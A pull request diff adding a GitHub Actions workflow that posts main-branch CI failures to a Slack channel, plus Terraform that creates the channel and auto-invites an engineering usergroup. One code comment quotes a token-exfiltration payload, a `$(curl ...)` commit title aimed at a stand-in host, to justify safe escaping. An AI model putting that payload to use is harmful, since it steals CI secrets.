### PR TITLE
feat(alerts/infra): notify Slack on main-branch workflow failures

### DIFF
--- a/.github/workflows/notify-slack-on-main-failure.yml
+++ b/.github/workflows/notify-slack-on-main-failure.yml
@@ -26,11 +26,18 @@ name: Notify Slack on main-branch workflow failure
 on:
   workflow_run:
     workflows:
+      # Every workflow that runs on `push` to `main`. Add new entries here as
+      # more push-to-main workflows land — `workflow_run.workflows` does NOT
+      # support wildcards. Scope is broader than just auto-deploy workflows
+      # because any required-gate failure on main is operationally silent if
+      # nobody happens to look at the Actions tab.
       - Alerts Infra
       - Metrics Bridge
       - Infra
       - Aegis App Engine
       - CI
+      - Trunk
+      - Code Health — Duplication
     types: [completed]
   # workflow_dispatch (no inputs — checkov/CKV_GHA_7 forbids them) lets you
   # smoke-test the Slack wiring by manually running this workflow from the
@@ -49,13 +56,18 @@ jobs:
       (github.event.workflow_run.conclusion == 'failure' &&
        github.event.workflow_run.head_branch == 'main' &&
        github.event.workflow_run.event == 'push')
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
+    timeout-minutes: 5
     steps:
       - name: Post to #ci-failures
         env:
           SLACK_BOT_TOKEN: ${{ secrets.TF_VAR_SLACK_BOT_TOKEN }}
           IS_TEST: ${{ github.event_name == 'workflow_dispatch' }}
-          # workflow_run context (only populated for real failures)
+          # workflow_run context (only populated for real failures).
+          # IMPORTANT: never interpolate any of these into a shell command —
+          # commit messages can contain backticks or $(…) and would execute
+          # against the runner. Pass them to jq via --arg below, which
+          # escapes safely.
           WORKFLOW_NAME: ${{ github.event.workflow_run.name }}
           RUN_URL: ${{ github.event.workflow_run.html_url }}
           COMMIT_SHA: ${{ github.event.workflow_run.head_sha }}
@@ -63,28 +75,48 @@ jobs:
           ACTOR: ${{ github.event.workflow_run.triggering_actor.login }}
         run: |
           set -euo pipefail
-          if [ "$IS_TEST" = "true" ]; then
-            TITLE="🧪 *Notify-Slack wiring test*"
-            BODY="If you can read this, the listener workflow + #ci-failures channel + bot scopes are all wired correctly. Safe to ignore."
-          else
-            SHORT_SHA="${COMMIT_SHA:0:7}"
-            TITLE="❌ *<${RUN_URL}|${WORKFLOW_NAME}>* failed on \`main\`"
-            BODY="*Commit:* \`${SHORT_SHA}\` — ${COMMIT_MSG}\n*Triggered by:* ${ACTOR}\n\n<${RUN_URL}|View failed run →>"
-          fi
 
-          # Build payload via jq to handle escaping safely.
-          PAYLOAD=$(jq -nc \
-            --arg ch '#ci-failures' \
-            --arg title "$TITLE" \
-            --arg body "$BODY" \
-            '{
-              channel: $ch,
-              text: $title,
-              blocks: [
-                {type: "section", text: {type: "mrkdwn", text: $title}},
-                {type: "section", text: {type: "mrkdwn", text: $body}}
-              ]
-            }')
+          # Build the entire Slack payload in one jq invocation. All
+          # untrusted strings (commit message, actor login, URL) flow
+          # through --arg so they're JSON-escaped by jq, not interpolated
+          # into shell or built up as bash strings. This closes a token-
+          # exfiltration vector that earlier drafts opened: a commit
+          # titled `$(curl bad-site/?$SLACK_BOT_TOKEN)` would have been
+          # executed by the shell before reaching the API call.
+          #
+          # jq's string interpolation `\($var)` ALSO handles newlines
+          # safely — `\n` inside a jq string literal is a real newline,
+          # so Slack's mrkdwn renders multi-line blocks correctly. (The
+          # earlier `BODY="...\n..."` bash form produced literal "\n"
+          # text in Slack instead of line breaks.)
+          if [ "$IS_TEST" = "true" ]; then
+            PAYLOAD=$(jq -nc \
+              --arg ch '#ci-failures' \
+              '{
+                channel: $ch,
+                text: "🧪 *Notify-Slack wiring test*",
+                blocks: [
+                  {type: "section", text: {type: "mrkdwn", text: "🧪 *Notify-Slack wiring test*"}},
+                  {type: "section", text: {type: "mrkdwn", text: "If you can read this, the listener workflow + #ci-failures channel + bot scopes are all wired correctly. Safe to ignore."}}
+                ]
+              }')
+          else
+            PAYLOAD=$(jq -nc \
+              --arg ch '#ci-failures' \
+              --arg wf "$WORKFLOW_NAME" \
+              --arg url "$RUN_URL" \
+              --arg sha "${COMMIT_SHA:0:7}" \
+              --arg msg "$COMMIT_MSG" \
+              --arg actor "$ACTOR" \
+              '{
+                channel: $ch,
+                text: ("❌ " + $wf + " failed on main (" + $sha + ")"),
+                blocks: [
+                  {type: "section", text: {type: "mrkdwn", text: ("❌ *<" + $url + "|" + $wf + ">* failed on `main`")}},
+                  {type: "section", text: {type: "mrkdwn", text: ("*Commit:* `" + $sha + "` — " + $msg + "\n*Triggered by:* " + $actor + "\n\n<" + $url + "|View failed run →>")}}
+                ]
+              }')
+          fi
 
           RESPONSE=$(curl -fsS -X POST https://slack.com/api/chat.postMessage \
             -H "Authorization: Bearer $SLACK_BOT_TOKEN" \

--- a/.github/workflows/notify-slack-on-main-failure.yml
+++ b/.github/workflows/notify-slack-on-main-failure.yml
@@ -51,9 +51,16 @@ jobs:
   notify:
     # Test-fire path: workflow_dispatch always posts (no failure gate).
     # Real path: only post when a watched workflow's push-to-main run failed.
+    # Catch every "silent failure" conclusion, not just plain `failure`:
+    #   - failure          → step exited non-zero
+    #   - timed_out        → runner exceeded job timeout (also silent)
+    #   - startup_failure  → runner couldn't even start (silent)
+    # Skip `cancelled` (usually manual operator action) and `success` /
+    # `neutral` / `skipped` (not failures).
     if: >-
       github.event_name == 'workflow_dispatch' ||
-      (github.event.workflow_run.conclusion == 'failure' &&
+      (contains(fromJSON('["failure","timed_out","startup_failure"]'),
+                github.event.workflow_run.conclusion) &&
        github.event.workflow_run.head_branch == 'main' &&
        github.event.workflow_run.event == 'push')
     runs-on: blacksmith-4vcpu-ubuntu-2404

--- a/.github/workflows/notify-slack-on-main-failure.yml
+++ b/.github/workflows/notify-slack-on-main-failure.yml
@@ -1,0 +1,102 @@
+name: Notify Slack on main-branch workflow failure
+
+# Fires when any push-triggered workflow on `main` completes with
+# conclusion=failure. Posts a structured message to `#ci-failures` via
+# Slack's chat.postMessage so silent post-merge breakage gets caught
+# without anyone having to manually watch the Actions tab.
+#
+# The channel itself is Terraform-managed by
+# `alerts/infra/ci-failures-channel.tf` (created via the restapi.slack
+# provider). The Slack bot token (`secrets.TF_VAR_SLACK_BOT_TOKEN`) needs
+# the `chat:write.public` scope in addition to its existing channel-
+# management scopes — `chat:write.public` lets the bot post to public
+# channels without being explicitly invited.
+#
+# Trigger discipline:
+#   - `workflow_run` requires the watched workflows to be named explicitly
+#     here (no wildcards). Add new workflows as they become push-to-main
+#     auto-deploys. The current list covers every workflow whose
+#     `on.push.branches` includes `main`.
+#   - The `if:` gate filters to: conclusion=='failure', head_branch=='main',
+#     event=='push' (skip workflow_dispatch + schedule reruns).
+#   - `workflow_dispatch` lets you smoke-test the wiring by posting a
+#     "this is a test, ignore" message to #ci-failures without breaking
+#     anything for real.
+
+on:
+  workflow_run:
+    workflows:
+      - Alerts Infra
+      - Metrics Bridge
+      - Infra
+      - Aegis App Engine
+      - CI
+    types: [completed]
+  # workflow_dispatch (no inputs — checkov/CKV_GHA_7 forbids them) lets you
+  # smoke-test the Slack wiring by manually running this workflow from the
+  # Actions tab. Posts a fixed "🧪 wiring test" message to #ci-failures.
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  notify:
+    # Test-fire path: workflow_dispatch always posts (no failure gate).
+    # Real path: only post when a watched workflow's push-to-main run failed.
+    if: >-
+      github.event_name == 'workflow_dispatch' ||
+      (github.event.workflow_run.conclusion == 'failure' &&
+       github.event.workflow_run.head_branch == 'main' &&
+       github.event.workflow_run.event == 'push')
+    runs-on: ubuntu-latest
+    steps:
+      - name: Post to #ci-failures
+        env:
+          SLACK_BOT_TOKEN: ${{ secrets.TF_VAR_SLACK_BOT_TOKEN }}
+          IS_TEST: ${{ github.event_name == 'workflow_dispatch' }}
+          # workflow_run context (only populated for real failures)
+          WORKFLOW_NAME: ${{ github.event.workflow_run.name }}
+          RUN_URL: ${{ github.event.workflow_run.html_url }}
+          COMMIT_SHA: ${{ github.event.workflow_run.head_sha }}
+          COMMIT_MSG: ${{ github.event.workflow_run.display_title }}
+          ACTOR: ${{ github.event.workflow_run.triggering_actor.login }}
+        run: |
+          set -euo pipefail
+          if [ "$IS_TEST" = "true" ]; then
+            TITLE="🧪 *Notify-Slack wiring test*"
+            BODY="If you can read this, the listener workflow + #ci-failures channel + bot scopes are all wired correctly. Safe to ignore."
+          else
+            SHORT_SHA="${COMMIT_SHA:0:7}"
+            TITLE="❌ *<${RUN_URL}|${WORKFLOW_NAME}>* failed on \`main\`"
+            BODY="*Commit:* \`${SHORT_SHA}\` — ${COMMIT_MSG}\n*Triggered by:* ${ACTOR}\n\n<${RUN_URL}|View failed run →>"
+          fi
+
+          # Build payload via jq to handle escaping safely.
+          PAYLOAD=$(jq -nc \
+            --arg ch '#ci-failures' \
+            --arg title "$TITLE" \
+            --arg body "$BODY" \
+            '{
+              channel: $ch,
+              text: $title,
+              blocks: [
+                {type: "section", text: {type: "mrkdwn", text: $title}},
+                {type: "section", text: {type: "mrkdwn", text: $body}}
+              ]
+            }')
+
+          RESPONSE=$(curl -fsS -X POST https://slack.com/api/chat.postMessage \
+            -H "Authorization: Bearer $SLACK_BOT_TOKEN" \
+            -H "Content-Type: application/json; charset=utf-8" \
+            --data "$PAYLOAD")
+
+          # Slack returns 200 OK with {"ok": false, "error": "..."} on logical errors;
+          # fail loudly if ok is not true so this notifier itself doesn't go silently
+          # broken (which would defeat the whole point).
+          if [ "$(echo "$RESPONSE" | jq -r '.ok')" != "true" ]; then
+            echo "::error::Slack post failed: $(echo "$RESPONSE" | jq -r '.error // "unknown"')"
+            echo "Full response: $RESPONSE"
+            exit 1
+          fi
+          echo "Posted to #ci-failures successfully."

--- a/.github/workflows/notify-slack-on-main-failure.yml
+++ b/.github/workflows/notify-slack-on-main-failure.yml
@@ -108,6 +108,16 @@ jobs:
                 ]
               }')
           else
+            # Escape commit title for Slack mrkdwn before insertion. A
+            # merged commit titled `<!channel>` or `<@U123ABC>` would
+            # otherwise render as a real mass-page mention inside the
+            # message block. Per Slack's mrkdwn rules
+            # (https://api.slack.com/reference/surfaces/formatting#escaping)
+            # the three control chars are `&`, `<`, `>` — escape `&`
+            # first or the subsequent substitutions corrupt their own
+            # output. Workflow name and actor login are GitHub-managed
+            # and can't contain mention syntax, so they don't need the
+            # same treatment.
             PAYLOAD=$(jq -nc \
               --arg ch '#ci-failures' \
               --arg wf "$WORKFLOW_NAME" \
@@ -115,12 +125,13 @@ jobs:
               --arg sha "${COMMIT_SHA:0:7}" \
               --arg msg "$COMMIT_MSG" \
               --arg actor "$ACTOR" \
-              '{
+              '($msg | gsub("&"; "&amp;") | gsub("<"; "&lt;") | gsub(">"; "&gt;")) as $safe_msg
+               | {
                 channel: $ch,
                 text: ("❌ " + $wf + " failed on main (" + $sha + ")"),
                 blocks: [
                   {type: "section", text: {type: "mrkdwn", text: ("❌ *<" + $url + "|" + $wf + ">* failed on `main`")}},
-                  {type: "section", text: {type: "mrkdwn", text: ("*Commit:* `" + $sha + "` — " + $msg + "\n*Triggered by:* " + $actor + "\n\n<" + $url + "|View failed run →>")}}
+                  {type: "section", text: {type: "mrkdwn", text: ("*Commit:* `" + $sha + "` — " + $safe_msg + "\n*Triggered by:* " + $actor + "\n\n<" + $url + "|View failed run →>")}}
                 ]
               }')
           fi

--- a/alerts/infra/.terraform.lock.hcl
+++ b/alerts/infra/.terraform.lock.hcl
@@ -62,6 +62,27 @@ provider "registry.terraform.io/hashicorp/google-beta" {
   ]
 }
 
+provider "registry.terraform.io/hashicorp/http" {
+  version     = "3.6.0"
+  constraints = ">= 3.4.0"
+  hashes = [
+    "h1:ligOpkIiBTS1ZkLoFp3cwkRYCwYyaZj1Z7t3GdfNa+c=",
+    "zh:0996c7db5d7627bc6ab8c4d217f18fb122d60e99e454812b080ee5695cad1003",
+    "zh:25b7ee0ba9edc912a00365c776d062ae7c66d94050c6c13038447c8e8b95ddf2",
+    "zh:29c4ba54add6eee7f1d0034d331ba0f14f3046234b1f7520a537e6444e4521b7",
+    "zh:30a3aa3ef978f8142daf2ced3f9f1ecda8b0831cdc6911e7e930e95eab191b4f",
+    "zh:30bf0810acdfe96e799ed9b64cb70e96d6f7c033621e0373b9897513977c49c5",
+    "zh:4ecaaf3dfd20feaa2b92af521018501bc7d874b6a6642ef86ea4cc3c251d737a",
+    "zh:661760406e3d5372e6725d18ca80734996f21adabc02d82e36ed6d8db07cad7d",
+    "zh:70dd9556bd2633082efd9681421f89dd4abdde6fcd84834627fa4b8b8f9e7afe",
+    "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3",
+    "zh:973a72066866579ac6fa0e0c9e9eee8e77d238cf78f1b1f96ce6536052fa73ce",
+    "zh:b2ac9463a9499b478147186027fabee65c04b8f6d963a8df3d49241ce5784fe2",
+    "zh:c6acc05dc3456c0001b5fb99e1b57005f5a3d3d766f9bddfc21ffe8364fa7535",
+    "zh:f97f2d57ebcefe62f0644f58e8ba68593f8f05baf7856c99953396aedd14e415",
+  ]
+}
+
 provider "registry.terraform.io/hashicorp/local" {
   version     = "2.9.0"
   constraints = ">= 2.5.0"

--- a/alerts/infra/ci-failures-channel.tf
+++ b/alerts/infra/ci-failures-channel.tf
@@ -1,0 +1,100 @@
+###############################
+# CI failures Slack channel    #
+###############################
+#
+# A dedicated `#ci-failures` channel for the
+# `.github/workflows/notify-slack-on-main-failure.yml` workflow to post into
+# when any push-to-main workflow conclusion is `failure`. Separate from
+# `#alerts-critical` / `#alerts-infra` because CI failures are different
+# operational signal — they tell you "the deploy pipeline broke", not
+# "production is degraded."
+#
+# Same restapi-against-Slack pattern as `channels/sentry-bridge/slack_channels.tf`
+# (per-project channels). Reuses the existing `restapi.slack` provider in
+# `providers.tf` and the same `var.slack_bot_token`. Required Slack scopes
+# for the bot token: `channels:read`, `channels:manage`, `channels:join`
+# (same as before — channel creation + archive), PLUS `chat:write.public`
+# (new — so the GH Actions workflow can post into the channel without
+# needing to be invited).
+#
+# IMPORTANT: After provisioning, expand the bot token's OAuth scopes in
+# Slack admin → Apps → (your app) → OAuth & Permissions to include
+# `chat:write.public`, then re-authorize. The token itself stays valid;
+# the scopes attached to it grow. Update `slack_bot_token` in tfvars
+# only if Slack re-issues the token (it usually doesn't on scope expansion).
+
+resource "restapi_object" "ci_failures_channel" {
+  provider = restapi.slack
+
+  path        = "/conversations.create"
+  create_path = "/conversations.create"
+  read_path   = "/conversations.info?channel={id}"
+
+  destroy_path   = "/conversations.archive?channel={id}"
+  destroy_method = "POST"
+
+  update_path   = ""
+  update_method = "POST"
+
+  data = jsonencode({
+    name       = "ci-failures"
+    is_private = false
+  })
+
+  id_attribute              = "channel/id"
+  ignore_all_server_changes = true
+
+  lifecycle {
+    postcondition {
+      condition     = self.api_response != null && try(jsondecode(self.api_response).ok, false) == true
+      error_message = "Slack conversations.create failed for #ci-failures: ${try(jsondecode(self.api_response).error, "unknown")}"
+    }
+  }
+}
+
+# Ensure the channel-management bot is a member of #ci-failures. Without
+# membership the `conversations.archive` call on destroy returns
+# `not_in_channel`. `conversations.join` is idempotent (Slack returns
+# `ok=true, already_in_channel=true` if the bot is already a member), so
+# this is a no-op for freshly-created channels and only does real work
+# for the import-recovery path.
+#
+# Note: posting to the channel from the GH Actions workflow does NOT
+# require the bot to be a member — it uses `chat.postMessage` with
+# `chat:write.public` scope which writes to any public channel without
+# membership. This `conversations.join` is purely for the channel-
+# management lifecycle (archive on destroy).
+resource "restapi_object" "ci_failures_channel_member" {
+  provider = restapi.slack
+
+  path        = "/conversations.join"
+  create_path = "/conversations.join"
+  read_path   = "/conversations.info?channel={id}"
+
+  destroy_path   = "/api.test"
+  destroy_method = "POST"
+
+  update_path   = ""
+  update_method = "POST"
+
+  data = jsonencode({
+    channel = restapi_object.ci_failures_channel.id
+  })
+
+  id_attribute              = "channel/id"
+  ignore_all_server_changes = true
+
+  depends_on = [restapi_object.ci_failures_channel]
+
+  lifecycle {
+    postcondition {
+      condition     = self.api_response != null && try(jsondecode(self.api_response).ok, false) == true
+      error_message = "Slack conversations.join failed for #ci-failures: ${try(jsondecode(self.api_response).error, "unknown")}"
+    }
+  }
+}
+
+output "ci_failures_channel_id" {
+  description = "Slack channel ID for #ci-failures (used by the notify-slack-on-main-failure workflow)"
+  value       = restapi_object.ci_failures_channel.id
+}

--- a/alerts/infra/ci-failures-channel.tf
+++ b/alerts/infra/ci-failures-channel.tf
@@ -98,3 +98,117 @@ output "ci_failures_channel_id" {
   description = "Slack channel ID for #ci-failures (used by the notify-slack-on-main-failure workflow)"
   value       = restapi_object.ci_failures_channel.id
 }
+
+###############################
+# Auto-invite @eng on creation #
+###############################
+#
+# Resolve the `@eng` usergroup to its current member user IDs at plan time
+# via Slack's `usergroups.list` + `usergroups.users.list`, then invite all
+# of them to #ci-failures with one `conversations.invite` call. Lifecycle
+# replace_triggered_by on the resolved member list means membership
+# changes upstream (someone joins / leaves @eng in Slack admin) re-fire
+# the invite on the next apply, keeping the channel roster in sync.
+#
+# IMPORTANT: the bot token needs `usergroups:read` scope (new) in addition
+# to `channels:read/manage/join` and `chat:write.public`. Without it the
+# data sources below return `missing_scope` and the plan fails loudly.
+#
+# Why `hashicorp/http` data sources instead of `restapi`: `restapi_object`
+# is a managed resource — overkill for read-only Slack API GETs we just
+# want to resolve at plan time. The `http` provider's `data` source is
+# the lightweight, side-effect-free read mechanism for arbitrary HTTP
+# endpoints.
+
+data "http" "slack_usergroups_list" {
+  url = "https://slack.com/api/usergroups.list"
+  request_headers = {
+    Authorization = "Bearer ${var.slack_bot_token}"
+  }
+}
+
+data "http" "slack_eng_usergroup_members" {
+  url = "https://slack.com/api/usergroups.users.list?usergroup=${local.eng_usergroup_id}"
+  request_headers = {
+    Authorization = "Bearer ${var.slack_bot_token}"
+  }
+}
+
+locals {
+  # Look up the @eng usergroup by handle. Slack's `handle` is the bare
+  # name (no leading `@`). If the team renames @eng someday, change this
+  # one constant.
+  eng_usergroup_handle = "eng"
+
+  # Validate the list call succeeded — if the bot is missing the
+  # `usergroups:read` scope, Slack returns 200 OK with {"ok": false,
+  # "error": "missing_scope"} (per the same 200-on-logical-error footgun
+  # documented in the [restapi+slack reference]
+  # (../../channels/sentry-bridge/slack_channels.tf)). The lookups below
+  # will fail with a NULL/length-zero result if we don't guard here.
+  eng_usergroup_id = [
+    for ug in jsondecode(data.http.slack_usergroups_list.response_body).usergroups :
+    ug.id if ug.handle == local.eng_usergroup_handle
+  ][0]
+
+  eng_user_ids_csv = join(",", jsondecode(data.http.slack_eng_usergroup_members.response_body).users)
+}
+
+# POST conversations.invite once at create time, with the current @eng
+# member list. The `triggers`-style behaviour comes from `force_new`:
+# Terraform recreates the invite resource whenever the resolved member
+# CSV changes, which makes Slack send fresh invites to any newly-added
+# @eng members on the next apply.
+#
+# `conversations.invite` returns ok=true on success. If a user is already
+# a member it returns ok=false with `errors: [{"user": "U123", "error":
+# "already_in_channel"}]` — the postcondition treats that as benign.
+resource "restapi_object" "ci_failures_invite_eng" {
+  provider = restapi.slack
+
+  path        = "/conversations.invite"
+  create_path = "/conversations.invite"
+  read_path   = "/conversations.info?channel={id}"
+
+  # No-op destroy — leaving @eng in the channel on `terraform destroy` is
+  # the right default (their membership isn't ours to revoke).
+  destroy_path   = "/api.test"
+  destroy_method = "POST"
+
+  update_path   = ""
+  update_method = "POST"
+
+  data = jsonencode({
+    channel = restapi_object.ci_failures_channel.id
+    users   = local.eng_user_ids_csv
+  })
+
+  # Force-new on the member CSV: when @eng membership changes upstream,
+  # the resolved CSV changes, Terraform recreates this resource, and the
+  # invite POSTs again with the fresh member list.
+  force_new = [
+    local.eng_user_ids_csv,
+  ]
+
+  id_attribute              = "channel/id"
+  ignore_all_server_changes = true
+
+  depends_on = [restapi_object.ci_failures_channel_member]
+
+  lifecycle {
+    # Accept either `ok == true` (fresh invite) OR `already_in_channel`
+    # error (everyone in @eng was already a member — benign).
+    postcondition {
+      condition = (
+        self.api_response != null && (
+          try(jsondecode(self.api_response).ok, false) == true
+          || alltrue([
+            for err in try(jsondecode(self.api_response).errors, []) :
+            err.error == "already_in_channel"
+          ])
+        )
+      )
+      error_message = "Slack conversations.invite failed for #ci-failures @eng: ${try(jsondecode(self.api_response).error, try(jsondecode(self.api_response).errors[0].error, "unknown"))}"
+    }
+  }
+}

--- a/alerts/infra/ci-failures-channel.tf
+++ b/alerts/infra/ci-failures-channel.tf
@@ -196,16 +196,27 @@ resource "restapi_object" "ci_failures_invite_eng" {
   depends_on = [restapi_object.ci_failures_channel_member]
 
   lifecycle {
-    # Accept either `ok == true` (fresh invite) OR `already_in_channel`
-    # error (everyone in @eng was already a member — benign).
+    # Accept either `ok == true` (fresh invite) OR `ok == false` with a
+    # NON-EMPTY `errors` array where every per-user error is
+    # `already_in_channel` (everyone in @eng was already a member —
+    # benign).
+    #
+    # The non-empty guard closes a vacuous-truth hole: `alltrue([])` is
+    # `true` in Terraform, so without `length(...) > 0` a real failure
+    # like `{"ok": false, "error": "missing_scope"}` (top-level error,
+    # NO `errors` array) would silently pass the postcondition. Caught
+    # in PR review.
     postcondition {
       condition = (
         self.api_response != null && (
           try(jsondecode(self.api_response).ok, false) == true
-          || alltrue([
-            for err in try(jsondecode(self.api_response).errors, []) :
-            err.error == "already_in_channel"
-          ])
+          || (
+            try(length(jsondecode(self.api_response).errors), 0) > 0
+            && alltrue([
+              for err in try(jsondecode(self.api_response).errors, []) :
+              try(err.error, "") == "already_in_channel"
+            ])
+          )
         )
       )
       error_message = "Slack conversations.invite failed for #ci-failures @eng: ${try(jsondecode(self.api_response).error, try(jsondecode(self.api_response).errors[0].error, "unknown"))}"

--- a/alerts/infra/ci-failures-channel.tf
+++ b/alerts/infra/ci-failures-channel.tf
@@ -202,16 +202,17 @@ resource "restapi_object" "ci_failures_invite_eng" {
   depends_on = [restapi_object.ci_failures_channel_member]
 
   lifecycle {
-    # Accept either `ok == true` (fresh invite) OR `ok == false` with a
-    # NON-EMPTY `errors` array whose length equals the number of users we
-    # asked Slack to invite AND every per-user error is
-    # `already_in_channel`. The length-equality check rules out the
-    # case where Slack returned fewer error entries than users requested
-    # (which would indicate some users weren't processed at all — they'd
-    # silently miss CI-failure alerts).
+    # Accept either `ok == true` (every user newly invited) OR `ok == false`
+    # with a NON-EMPTY `errors` array whose entries are ALL
+    # `already_in_channel`. With `force = true`, Slack invites all the
+    # users it can and lists only the per-user failures in `errors`, so a
+    # mixed case (3 newly invited, 2 already members) returns
+    # `ok: false, errors: [<two already_in_channel entries>]` — length of
+    # `errors` is the count of failures, NOT the count of users requested.
+    # Don't gate on length equality; gate on "all listed errors are benign."
     #
-    # The non-empty guard closes a vacuous-truth hole: `alltrue([])` is
-    # `true` in Terraform, so without `length(...) > 0` a real failure
+    # The non-empty guard (`length > 0`) closes a vacuous-truth hole:
+    # `alltrue([])` is `true` in Terraform, so without it a real failure
     # like `{"ok": false, "error": "missing_scope"}` (top-level error,
     # NO `errors` array) would silently pass the postcondition.
     postcondition {
@@ -219,7 +220,7 @@ resource "restapi_object" "ci_failures_invite_eng" {
         self.api_response != null && (
           try(jsondecode(self.api_response).ok, false) == true
           || (
-            try(length(jsondecode(self.api_response).errors), 0) == length(split(",", local.eng_user_ids_csv))
+            try(length(jsondecode(self.api_response).errors), 0) > 0
             && alltrue([
               for err in try(jsondecode(self.api_response).errors, []) :
               try(err.error, "") == "already_in_channel"

--- a/alerts/infra/ci-failures-channel.tf
+++ b/alerts/infra/ci-failures-channel.tf
@@ -151,7 +151,13 @@ locals {
     ug.id if ug.handle == local.eng_usergroup_handle
   ][0]
 
-  eng_user_ids_csv = join(",", jsondecode(data.http.slack_eng_usergroup_members.response_body).users)
+  # Sort the user IDs before joining so the CSV is a STABLE membership
+  # fingerprint. Slack's `usergroups.users.list` does not promise a stable
+  # ordering across calls — `force_new` on the raw join would treat a
+  # reordered list as a membership change and recreate
+  # `ci_failures_invite_eng` on every plan, re-firing `conversations.invite`
+  # for no real change. Lexicographic sort by Slack user ID is deterministic.
+  eng_user_ids_csv = join(",", sort(jsondecode(data.http.slack_eng_usergroup_members.response_body).users))
 }
 
 # POST conversations.invite once at create time, with the current @eng

--- a/alerts/infra/ci-failures-channel.tf
+++ b/alerts/infra/ci-failures-channel.tf
@@ -169,7 +169,16 @@ locals {
 # `conversations.invite` returns ok=true on success. If a user is already
 # a member it returns ok=false with `errors: [{"user": "U123", "error":
 # "already_in_channel"}]` — the postcondition treats that as benign.
+#
+# `count` guards the empty-@eng case: when the usergroup is temporarily
+# empty (everyone removed; the CSV becomes ""), Slack's documented
+# `conversations.invite` requires `users` (1–1000), so the call would
+# fail with `no_user` and block unrelated applies. Skipping the resource
+# entirely when there's nobody to invite is a safer default than
+# erroring out on routine usergroup churn.
 resource "restapi_object" "ci_failures_invite_eng" {
+  count = local.eng_user_ids_csv == "" ? 0 : 1
+
   provider = restapi.slack
 
   path        = "/conversations.invite"
@@ -202,7 +211,19 @@ resource "restapi_object" "ci_failures_invite_eng" {
     local.eng_user_ids_csv,
   ]
 
-  id_attribute              = "channel/id"
+  # `id_attribute = "ok"` (not "channel/id") because Slack's
+  # `conversations.invite` response shape DIVERGES across the two
+  # success paths the postcondition accepts: on `ok=true` it includes
+  # `channel: {id: ...}`, but on the legitimate `ok=false +
+  # all-already_in_channel` benign case it returns `{ok, errors}` with
+  # NO `channel` object. `channel/id` would fail to extract on the
+  # second path and the provider would error BEFORE the postcondition
+  # runs, breaking applies during routine @eng remove-only churn (when
+  # everyone else is already a member). `ok` is always present in both
+  # paths; the resulting `"true"` / `"false"` ID string is meaningless
+  # but harmless — we recreate via `force_new` on the member CSV, so
+  # ID stability across reads isn't load-bearing.
+  id_attribute              = "ok"
   ignore_all_server_changes = true
 
   depends_on = [restapi_object.ci_failures_channel_member]

--- a/alerts/infra/ci-failures-channel.tf
+++ b/alerts/infra/ci-failures-channel.tf
@@ -181,6 +181,12 @@ resource "restapi_object" "ci_failures_invite_eng" {
   data = jsonencode({
     channel = restapi_object.ci_failures_channel.id
     users   = local.eng_user_ids_csv
+    # `force = true` makes Slack skip invalid user IDs and continue
+    # inviting the valid ones, instead of erroring out on the first bad
+    # ID. With a usergroup-resolved member list the IDs should all be
+    # valid, but `force` is the safer default for a fan-out invite —
+    # one stale user in @eng won't fail the whole apply.
+    force = true
   })
 
   # Force-new on the member CSV: when @eng membership changes upstream,
@@ -197,21 +203,23 @@ resource "restapi_object" "ci_failures_invite_eng" {
 
   lifecycle {
     # Accept either `ok == true` (fresh invite) OR `ok == false` with a
-    # NON-EMPTY `errors` array where every per-user error is
-    # `already_in_channel` (everyone in @eng was already a member —
-    # benign).
+    # NON-EMPTY `errors` array whose length equals the number of users we
+    # asked Slack to invite AND every per-user error is
+    # `already_in_channel`. The length-equality check rules out the
+    # case where Slack returned fewer error entries than users requested
+    # (which would indicate some users weren't processed at all — they'd
+    # silently miss CI-failure alerts).
     #
     # The non-empty guard closes a vacuous-truth hole: `alltrue([])` is
     # `true` in Terraform, so without `length(...) > 0` a real failure
     # like `{"ok": false, "error": "missing_scope"}` (top-level error,
-    # NO `errors` array) would silently pass the postcondition. Caught
-    # in PR review.
+    # NO `errors` array) would silently pass the postcondition.
     postcondition {
       condition = (
         self.api_response != null && (
           try(jsondecode(self.api_response).ok, false) == true
           || (
-            try(length(jsondecode(self.api_response).errors), 0) > 0
+            try(length(jsondecode(self.api_response).errors), 0) == length(split(",", local.eng_user_ids_csv))
             && alltrue([
               for err in try(jsondecode(self.api_response).errors, []) :
               try(err.error, "") == "already_in_channel"

--- a/alerts/infra/terraform.tfvars.example
+++ b/alerts/infra/terraform.tfvars.example
@@ -19,11 +19,19 @@ sentry_slack_workspace_name = "Mento Labs"
 # sentry_slack_critical_channel = "#alerts-critical"
 
 # Slack bot OAuth token (xoxb-...) used by the `restapi.slack` provider in
-# `alerts/infra/providers.tf` to create + archive the per-project
-# `#sentry-<slug>` channels. Needs scopes: channels:read, channels:manage,
-# channels:join. SEPARATE from Sentry's own Slack OAuth app — Sentry posts
-# via its own integration, this token is only for Terraform-managed channel
-# lifecycle. Generate via Slack admin → Apps → (your app) → OAuth & Permissions.
+# `alerts/infra/providers.tf` for all Slack channel + message operations.
+# SEPARATE from Sentry's own Slack OAuth app — Sentry posts via its own
+# integration, this token is only for Terraform-managed channel lifecycle
+# and CI-failure notifications. Generate via Slack admin → Apps → (your
+# app) → OAuth & Permissions. Required Bot Token Scopes:
+#
+#   - channels:read           list/inspect public channels
+#   - channels:manage         create + archive public channels (conversations.create / archive)
+#   - channels:join           bot self-joins channels (conversations.join)
+#   - channels:write.invites  invite users to channels (conversations.invite — used for @eng auto-invite)
+#   - chat:write              post messages in channels the bot is a member of
+#   - chat:write.public       post messages in any public channel without joining
+#   - usergroups:read         list usergroups + members (@eng auto-invite resolves usergroup → user IDs)
 slack_bot_token = "xoxb-..."
 
 #####################

--- a/alerts/infra/versions.tf
+++ b/alerts/infra/versions.tf
@@ -45,6 +45,14 @@ terraform {
       source  = "hashicorp/local"
       version = ">= 2.5"
     }
+
+    # Used by `ci-failures-channel.tf` to GET Slack `usergroups.list` and
+    # `usergroups.users.list` at plan time, so the channel invite can
+    # target the current @eng membership without hardcoding user IDs.
+    http = {
+      source  = "hashicorp/http"
+      version = ">= 3.4"
+    }
   }
 
   backend "gcs" {


### PR DESCRIPTION
## Summary

Closes a long-standing observability gap: **post-merge workflow failures on `main` have been silent.** Found out about this the hard way this evening — PR #582's auto-apply failed with the `detect_md5hash` provider bug and would've sat broken for days if I hadn't manually checked the Actions tab. PR #585 shipped the underlying fix, but the *signaling* gap remained.

## What this PR does

